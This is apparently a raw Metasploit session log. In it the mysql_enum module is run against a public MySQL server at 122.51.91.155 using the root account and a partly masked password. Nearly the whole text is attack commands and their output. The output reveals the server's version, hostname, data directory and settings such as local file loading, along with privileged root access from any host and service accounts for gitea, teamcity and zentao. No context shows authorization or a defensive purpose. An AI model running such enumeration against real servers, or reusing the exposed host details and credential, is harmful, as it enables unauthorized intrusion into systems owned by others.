---- --------------- -------- ----------- PASSWORD no The password for the specified username RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framew ork/wiki/Using-Metasploit RPORT 3306 yes The target port (TCP) USERNAME no The username to authenticate as
msf6 auxiliary(admin/mysql/mysql_enum) > set RHOSTS 122.51.91.155
RHOSTS => 122.51.91.155 msf6 auxiliary(admin/mysql/mysql_enum) > SET username root [-] Unknown command: SET msf6 auxiliary(admin/mysql/mysql_enum) > set username root username => root msf6 auxiliary(admin/mysql/mysql_enum) > set password VT@4bCO***aZ password => VT@4bCO***aZ msf6 auxiliary(admin/mysql/mysql_enum) > exploit
[*] Running module against 122.51.91.155
[*] 122.51.91.155:3306 - Running MySQL Enumerator...
[*] 122.51.91.155:3306 - Enumerating Parameters [*] 122.51.91.155:3306 - MySQL Version: 5.7.27-log [*] 122.51.91.155:3306 - Compiled for the following OS: linux-glibc2.12 [*] 122.51.91.155:3306 - Architecture: x86_64 [*] 122.51.91.155:3306 - Server Hostname: meiguo-txc01 [*] 122.51.91.155:3306 - Data Directory: /data/mysql/data/ [*] 122.51.91.155:3306 - Logging of queries and logins: ON [*] 122.51.91.155:3306 - Log Files Location: OFF [*] 122.51.91.155:3306 - Old Password Hashing Algorithm 0 [*] 122.51.91.155:3306 - Loading of local files: ON [*] 122.51.91.155:3306 - Deny logins with old Pre-4.1 Passwords: ON [*] 122.51.91.155:3306 - Allow Use of symlinks for Database Files: DISABLED [*] 122.51.91.155:3306 - Allow Table Merge: [*] 122.51.91.155:3306 - SSL Connection: DISABLED [*] 122.51.91.155:3306 - Enumerating Accounts: [-] 122.51.91.155:3306 - MySQL Error: RbMysql::ServerError::BadFieldError Unknown column 'password' in 'field list' [*] 122.51.91.155:3306 - The following users have GRANT Privilege: [*] 122.51.91.155:3306 - User: root Host: % [*] 122.51.91.155:3306 - The following users have CREATE USER Privilege: [*] 122.51.91.155:3306 - User: root Host: % [*] 122.51.91.155:3306 - The following users have RELOAD Privilege: [*] 122.51.91.155:3306 - User: root Host: % [*] 122.51.91.155:3306 - The following users have SHUTDOWN Privilege: [*] 122.51.91.155:3306 - User: root Host: % [*] 122.51.91.155:3306 - The following users have SUPER Privilege: [*] 122.51.91.155:3306 - User: root Host: % [*] 122.51.91.155:3306 - User: mysql.session Host: localhost [*] 122.51.91.155:3306 - The following users have FILE Privilege: [*] 122.51.91.155:3306 - User: root Host: % [*] 122.51.91.155:3306 - The following users have PROCESS Privilege: [*] 122.51.91.155:3306 - User: root Host: % [*] 122.51.91.155:3306 - The following accounts have privileges to the mysql database: [*] 122.51.91.155:3306 - User: root Host: % [-] 122.51.91.155:3306 - MySQL Error: RbMysql::ServerError::BadFieldError Unknown column 'password' in 'field list' [*] 122.51.91.155:3306 - The following accounts are not restricted by source: [*] 122.51.91.155:3306 - User: gitea Host: % [*] 122.51.91.155:3306 - User: root Host: % [*] 122.51.91.155:3306 - User: teamcity Host: % [*] 122.51.91.155:3306 - User: zentao Host: %